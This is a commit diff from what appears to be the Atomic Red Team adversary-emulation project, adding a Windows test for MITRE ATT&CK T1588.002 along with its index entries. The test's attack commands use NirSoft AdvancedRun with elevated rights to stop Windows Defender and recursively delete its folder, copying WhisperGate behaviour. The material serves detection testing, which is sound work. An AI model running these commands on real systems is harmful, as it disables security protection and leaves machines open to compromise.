Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -867,6 +867,7 @@ discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
 discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
 discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
+resource-development,T1588.002,Tool,1,Run NirSoft AdvancedRun,f7d43d35-d628-4582-bb03-01b1c5e10d11,powershell
 execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1429,7 +1429,8 @@
 - T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1588.002 Tool](../../T1588.002/T1588.002.md)
+  - Atomic Test #1: Run NirSoft AdvancedRun [windows]
 - T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/index.yaml

@@ -59176,7 +59176,48 @@ resource-development:
       x_mitre_detection: Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on post-compromise phases of the adversary lifecycle.
-    atomic_tests: []
+      identifier: T1588.002
+    atomic_tests:
+    - name: Run NirSoft AdvancedRun
+      auto_generated_guid: f7d43d35-d628-4582-bb03-01b1c5e10d11
+      description: "Information on NirSoft AdvancedRun and it's creators found here:
+        http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe
+        with similar behavior identified during the WhisperGate campaign.\nUpon successful
+        execution, AdvancedRun.exe will run and stop Defender and attempt to delete
+        the Defender folder on disk. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_folder:
+          description: Local path of AdvancedRun executable
+          type: Path
+          default: PathToAtomicsFolder\T1588.002\bin\AdvancedRun
+        local_executable:
+          description: name of the advancedrun executable
+          type: String
+          default: advancedrun.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable}
+
+'
+        prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
+            Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
+      executor:
+        command: |
+          #{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
+          #{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
+        cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction
+          Ignore
+
+'
+        name: powershell
+        elevation_required: true
   T1608.001:
     technique:
       external_references:

atomics/T1588.002/T1588.002.md

@@ -0,0 +1,65 @@
+# T1588.002 - Tool
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1588/002)
+<blockquote>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
+
+Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Run NirSoft AdvancedRun](#atomic-test-1---run-nirsoft-advancedrun)
+
+
+<br/>
+
+## Atomic Test #1 - Run NirSoft AdvancedRun
+Information on NirSoft AdvancedRun and it's creators found here: http://www.nirsoft.net/utils/advanced_run.html
+This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+Upon successful execution, AdvancedRun.exe will run and stop Defender and attempt to delete the Defender folder on disk.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f7d43d35-d628-4582-bb03-01b1c5e10d11
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_folder | Local path of AdvancedRun executable | Path | PathToAtomicsFolder&#92;T1588.002&#92;bin&#92;AdvancedRun|
+| local_executable | name of the advancedrun executable | String | advancedrun.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+#{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
+#{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Advancedrun.exe must be located at #{local_folder}\#{local_executable}
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip"
+  Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
+```
+
+
+
+
+<br/>